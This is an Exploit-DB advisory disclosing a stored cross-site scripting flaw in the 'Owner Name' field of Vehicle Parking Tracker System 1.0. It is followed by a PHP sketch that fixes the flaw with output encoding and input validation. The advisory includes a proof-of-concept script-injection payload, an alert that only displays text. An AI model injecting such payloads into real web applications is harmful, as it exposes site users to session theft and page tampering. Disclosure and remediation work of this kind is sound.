Vehicle Parking Tracker System 1.0 – ‘Owner Name’ Stored Cross-Site Scripting

  • Author: Anmol K Sachan
    Date: 2021-02-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49509/
  • # Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name' Stored Cross-Site Scripting
    # Date: 2021-01-30
    # Exploit Author: Anmol K Sachan
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
    # Software: Vehicle Parking Tracker System
    # Version : 1.0
    # Vulnerability Type: Cross-site Scripting
    # Tested on Windows 10 XAMPP
    # This application is vulnerable to stored XSS.
    # Vulnerable script:
    
    1) http://localhost/vpms/add-vehicle.php
    # Vulnerable parameters: 'Owner Name'
    # Payload used: ()"><script>alert(‘document.cookie’)</script>
    # POC: manage-incomingvehicle.php
    # You will see your JavaScript code executed.
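
The remediation for this class of bug is to HTML-encode the stored owner name where manage-incomingvehicle.php renders it, with input validation in add-vehicle.php as a second layer. The sketch below is an added example, not code from the application or the advisory; the row layout, the `OwnerName` column name and both helper functions are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed rows standing in for stored vehicle entries.
// The column name "OwnerName" is an assumption, not the application's schema.
$rows = [
    ['OwnerName' => "Jane O'Neil"],
    ['OwnerName' => '()"><script>alert(1)</script>'],
];

// Encode for HTML element content and quoted attribute values.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Defence in depth on the add-vehicle.php side: allowlist of letters,
// combining marks, space, dot, apostrophe and hyphen, 1 to 100 characters.
function is_plausible_owner_name(string $name): bool
{
    return preg_match("/^[\\p{L}\\p{M} .'-]{1,100}$/u", $name) === 1;
}

foreach ($rows as $row) {
    $name = $row['OwnerName'];
    // Unencoded form that lets stored markup execute: echo "<td>$name</td>";
    // Rows that fail the allowlist are still rendered, but encoded and flagged.
    $flag = is_plausible_owner_name($name) ? '' : ' class="needs-review"';
    echo "<tr{$flag}><td>" . html_escape($name) . "</td></tr>\n";
}
```

Encoding at output time also neutralises entries that were stored before any input validation was added, which validation alone cannot do.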